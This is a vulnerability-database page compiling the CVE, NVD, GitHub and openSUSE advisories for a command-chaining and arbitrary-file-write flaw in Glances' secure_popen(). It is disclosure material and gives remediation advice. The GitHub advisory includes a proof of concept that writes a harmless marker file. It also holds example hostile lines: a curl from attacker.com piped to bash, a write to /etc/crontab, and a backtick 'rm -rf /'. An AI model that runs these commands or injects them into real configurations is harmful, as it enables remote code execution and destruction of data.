CVE-2026-53925 (GCVE-0-2026-53925)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:03 – Updated: 2026-06-25 18:25 – CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-53925",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:25:09.523064Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:25:13.508Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.0.8, \u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:03:43.333Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
}
],
"source": {
"advisory": "GHSA-3vwc-qwhc-3mj7",
"discovery": "UNKNOWN"
},
"title": "Glances: Arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-53925",
"datePublished": "2026-06-25T18:03:43.333Z",
"dateReserved": "2026-06-11T15:46:12.316Z",
"dateUpdated": "2026-06-25T18:25:13.508Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-53925",
"date": "2026-06-26",
"epss": "0.00184",
"percentile": "0.08163"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-53925\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T18:25:09.523064Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T18:24:59.937Z\"}}], \"cna\": {\"title\": \"Glances: Arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration\", \"source\": {\"advisory\": \"GHSA-3vwc-qwhc-3mj7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.0.8, \u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. 
From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:03:43.333Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-53925\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-25T18:25:13.508Z\", \"dateReserved\": \"2026-06-11T15:46:12.316Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:03:43.333Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-53925
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-25 19:58

| Vendor | Product | Version |
|---|---|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.0.8, \u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-53925",
"lastModified": "2026-06-25T19:58:30.847",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-53925",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:25:09.523064Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:40.017",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-3VWC-QWHC-3MJ7
Vulnerability from github – Published: 2026-06-23 17:59 – Updated: 2026-06-23 17:59

Summary
The secure_popen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.
When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |).
Crucially, this vulnerability is not mitigated by the --disable-config-exec flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in config.get_value(); it does not affect the secure_popen() function's interpretation of shell-like operators.
Details
Affected code path 1 — Default AMP (glances/amps/default/__init__.py:69)
res = self.get('command')
# ...
self.set_result(secure_popen(res).rstrip())
The command config value is loaded from [amp_<name>] sections via GlancesAmp.load_config() (glances/amps/amp.py:81):
self.configs[param] = config.get_value(amp_section, param).split(',')
Affected code path 2 — SystemV AMP (glances/amps/systemv/__init__.py:60)
res = secure_popen(self.get('service_cmd'))
The service_cmd config value is loaded from [amp_systemv] sections via the same GlancesAmp.load_config() method.
Sink — secure_popen() (glances/secure.py:33-77)
The function explicitly parses:
- > for file redirection (line 39): cmd.split('>') — the path after > is used directly in open(stdout_redirect, "w") (line 71) with no path validation.
- | for command piping (line 51): cmd.split('|') — each segment is executed as a separate Popen with stdout piped to the next.
- && for command chaining (line 27 in secure_popen): cmd.split('&&') — each segment is executed sequentially.
None of these operators are sanitized or restricted when loading AMP configuration values.
Why --disable-config-exec does not help:
The --disable-config-exec flag (introduced for CVE-2026-33641) only prevents system_exec() from running backtick-embedded commands in config.get_value(). It does not affect how the resulting string value is processed by secure_popen(). A command value like echo data > /etc/crontab contains no backticks and passes through get_value() unchanged, then secure_popen() interprets the > operator and writes to the arbitrary path.
PoC
Clean-checkout recipe:
- Create a test configuration file:
cat > /tmp/poc-glances.conf << 'EOF'
[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp
[outputs]
cors_origins=*
EOF
- Run a Python script that simulates the AMP command execution path:
import sys
sys.path.insert(0, '/path/to/glances')
from glances.config import Config
from glances.secure import secure_popen
import os
# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)
config = Config(config_dir='/tmp/poc-glances.conf', disable_config_exec=True)
# Read AMP command value (same as amp.py load_config)
command = config.get_value('amp_poc', 'command')
print(f'Command: {command!r}')
# Execute (same as amps/default/__init__.py line 69)
marker = '/tmp/cve-poc-marker-amp'
assert not os.path.exists(marker), 'Clean state required'
result = secure_popen(command)
print(f'Result: {result!r}')
# Verify arbitrary file write occurred
assert os.path.exists(marker), 'VULNERABILITY NOT CONFIRMED'
with open(marker) as f:
content = f.read()
print(f'Written to {marker}: {content!r}')
assert 'POC_ARBITRARY_FILE_WRITE' in content
# Cleanup
os.remove(marker)
print('CONFIRMED: Arbitrary file write via secure_popen > in AMP command')
Expected vulnerable output:
Command: 'echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp'
Result: 'POC_ARBITRARY_FILE_WRITE\n'
Written to /tmp/cve-poc-marker-amp: 'POC_ARBITRARY_FILE_WRITE\n'
CONFIRMED: Arbitrary file write via secure_popen > in AMP command
Negative/control case (demonstrating --disable-config-exec only blocks backticks):
# This IS blocked by --disable-config-exec:
# command=`rm -rf /` → get_value() skips backtick execution
# This is NOT blocked by --disable-config-exec:
# command=echo data > /etc/crontab → secure_popen writes to /etc/crontab
Cleanup:
rm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp
Impact
An attacker who can modify glances.conf (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:
- Write arbitrary content to arbitrary files via the `>` operator — e.g., overwriting `/etc/crontab`, `~/.ssh/authorized_keys`, or any file writable by the Glances process user.
- Execute arbitrary commands via the `&&` and `|` operators — e.g., `echo x && curl http://attacker.com/shell.sh | bash`.
- Exfiltrate data via the `|` operator piping command output to network utilities.
The existing --disable-config-exec mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.get_value() backtick processing vs. secure_popen() operator interpretation).
Suggested remediation
- Remove file redirection support from `secure_popen()` unless explicitly required. The `>` operator in `__secure_popen()` (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).
- Sanitize AMP command values before passing them to `secure_popen()`. Apply the same sanitization used in `actions.py:_sanitize_mustache_dict()` to strip `&&`, `|`, `>>`, and `>` from AMP `command` and `service_cmd` config values, or refuse to execute commands containing these operators.
- Consider replacing `secure_popen()` with `subprocess.run(shell=False)` using explicit argument arrays. The `secure_popen()` function reimplements shell-like operator parsing (`&&`, `|`, `>`), which is inherently risky. Standard `subprocess.run()` with `shell=False` and an explicit argument list avoids this class of vulnerability entirely.
- Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.8"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-53925"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-23T17:59:01Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe `secure_popen()` function in `glances/secure.py` interprets `\u003e` (file redirection), `|` (pipe), and `\u0026\u0026` (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.\n\nWhen Application Monitoring Process (AMP) modules load their `command` or `service_cmd` configuration values from `glances.conf`, those values are passed directly to `secure_popen()` with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via `\u003e`), chain arbitrary commands (via `\u0026\u0026`), or pipe command output to arbitrary programs (via `|`).\n\nCrucially, this vulnerability is **not mitigated** by the `--disable-config-exec` flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in `config.get_value()`; it does not affect the `secure_popen()` function\u0027s interpretation of shell-like operators.\n\n### Details\n\n**Affected code path 1 \u2014 Default AMP (`glances/amps/default/__init__.py:69`)**\n\n```python\nres = self.get(\u0027command\u0027)\n# ...\nself.set_result(secure_popen(res).rstrip())\n```\n\nThe `command` config value is loaded from `[amp_\u003cname\u003e]` sections via `GlancesAmp.load_config()` (`glances/amps/amp.py:81`):\n\n```python\nself.configs[param] = config.get_value(amp_section, param).split(\u0027,\u0027)\n```\n\n**Affected code path 2 \u2014 SystemV AMP (`glances/amps/systemv/__init__.py:60`)**\n\n```python\nres = secure_popen(self.get(\u0027service_cmd\u0027))\n```\n\nThe `service_cmd` config value is loaded from `[amp_systemv]` sections via the same `GlancesAmp.load_config()` method.\n\n**Sink \u2014 `secure_popen()` (`glances/secure.py:33-77`)**\n\nThe function explicitly parses:\n- `\u003e` for file redirection (line 39): `cmd.split(\u0027\u003e\u0027)` \u2014 the path after 
`\u003e` is used directly in `open(stdout_redirect, \"w\")` (line 71) with **no path validation**.\n- `|` for command piping (line 51): `cmd.split(\u0027|\u0027)` \u2014 each segment is executed as a separate `Popen` with stdout piped to the next.\n- `\u0026\u0026` for command chaining (line 27 in `secure_popen`): `cmd.split(\u0027\u0026\u0026\u0027)` \u2014 each segment is executed sequentially.\n\nNone of these operators are sanitized or restricted when loading AMP configuration values.\n\n**Why `--disable-config-exec` does not help:**\n\nThe `--disable-config-exec` flag (introduced for CVE-2026-33641) only prevents `system_exec()` from running backtick-embedded commands in `config.get_value()`. It does not affect how the resulting string value is processed by `secure_popen()`. A command value like `echo data \u003e /etc/crontab` contains no backticks and passes through `get_value()` unchanged, then `secure_popen()` interprets the `\u003e` operator and writes to the arbitrary path.\n\n### PoC\n\n**Clean-checkout recipe:**\n\n1. Create a test configuration file:\n\n```bash\ncat \u003e /tmp/poc-glances.conf \u003c\u003c \u0027EOF\u0027\n[amp_poc]\nenable=true\nregex=.*\nrefresh=3\ncommand=echo POC_ARBITRARY_FILE_WRITE \u003e /tmp/cve-poc-marker-amp\n\n[outputs]\ncors_origins=*\nEOF\n```\n\n2. 
Run a Python script that simulates the AMP command execution path:\n\n```python\nimport sys\nsys.path.insert(0, \u0027/path/to/glances\u0027)\nfrom glances.config import Config\nfrom glances.secure import secure_popen\nimport os\n\n# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)\nconfig = Config(config_dir=\u0027/tmp/poc-glances.conf\u0027, disable_config_exec=True)\n\n# Read AMP command value (same as amp.py load_config)\ncommand = config.get_value(\u0027amp_poc\u0027, \u0027command\u0027)\nprint(f\u0027Command: {command!r}\u0027)\n\n# Execute (same as amps/default/__init__.py line 69)\nmarker = \u0027/tmp/cve-poc-marker-amp\u0027\nassert not os.path.exists(marker), \u0027Clean state required\u0027\nresult = secure_popen(command)\nprint(f\u0027Result: {result!r}\u0027)\n\n# Verify arbitrary file write occurred\nassert os.path.exists(marker), \u0027VULNERABILITY NOT CONFIRMED\u0027\nwith open(marker) as f:\n content = f.read()\nprint(f\u0027Written to {marker}: {content!r}\u0027)\nassert \u0027POC_ARBITRARY_FILE_WRITE\u0027 in content\n\n# Cleanup\nos.remove(marker)\nprint(\u0027CONFIRMED: Arbitrary file write via secure_popen \u003e in AMP command\u0027)\n```\n\n**Expected vulnerable output:**\n\n```\nCommand: \u0027echo POC_ARBITRARY_FILE_WRITE \u003e /tmp/cve-poc-marker-amp\u0027\nResult: \u0027POC_ARBITRARY_FILE_WRITE\\n\u0027\nWritten to /tmp/cve-poc-marker-amp: \u0027POC_ARBITRARY_FILE_WRITE\\n\u0027\nCONFIRMED: Arbitrary file write via secure_popen \u003e in AMP command\n```\n\n**Negative/control case (demonstrating `--disable-config-exec` only blocks backticks):**\n\n```python\n# This IS blocked by --disable-config-exec:\n# command=`rm -rf /` \u2192 get_value() skips backtick execution\n\n# This is NOT blocked by --disable-config-exec:\n# command=echo data \u003e /etc/crontab \u2192 secure_popen writes to /etc/crontab\n```\n\n**Cleanup:**\n\n```bash\nrm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp\n```\n\n### Impact\n\nAn 
attacker who can modify `glances.conf` (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:\n\n1. **Write arbitrary content to arbitrary files** via the `\u003e` operator \u2014 e.g., overwriting `/etc/crontab`, `~/.ssh/authorized_keys`, or any file writable by the Glances process user.\n\n2. **Execute arbitrary commands** via the `\u0026\u0026` and `|` operators \u2014 e.g., `echo x \u0026\u0026 curl http://attacker.com/shell.sh | bash`.\n\n3. **Exfiltrate data** via the `|` operator piping command output to network utilities.\n\nThe existing `--disable-config-exec` mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (`config.get_value()` backtick processing vs. `secure_popen()` operator interpretation).\n\n### Suggested remediation\n\n1. **Remove file redirection support from `secure_popen()`** unless explicitly required. The `\u003e` operator in `__secure_popen()` (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).\n\n2. **Sanitize AMP command values** before passing them to `secure_popen()`. Apply the same sanitization used in `actions.py:_sanitize_mustache_dict()` to strip `\u0026\u0026`, `|`, `\u003e\u003e`, and `\u003e` from AMP command and service_cmd config values, or refuse to execute commands containing these operators.\n\n3. **Consider replacing `secure_popen()` with `subprocess.run(shell=False)`** using explicit argument arrays. The `secure_popen()` function reimplements shell-like operator parsing (`\u0026\u0026`, `|`, `\u003e`) which is inherently risky. Standard `subprocess.run()` with `shell=False` and an explicit argument list avoids this class of vulnerability entirely.\n\n4. 
**Add a regression test** that verifies AMP commands cannot contain file redirection or command chaining operators.",
"id": "GHSA-3vwc-qwhc-3mj7",
"modified": "2026-06-23T17:59:01Z",
"published": "2026-06-23T17:59:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Glances has arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
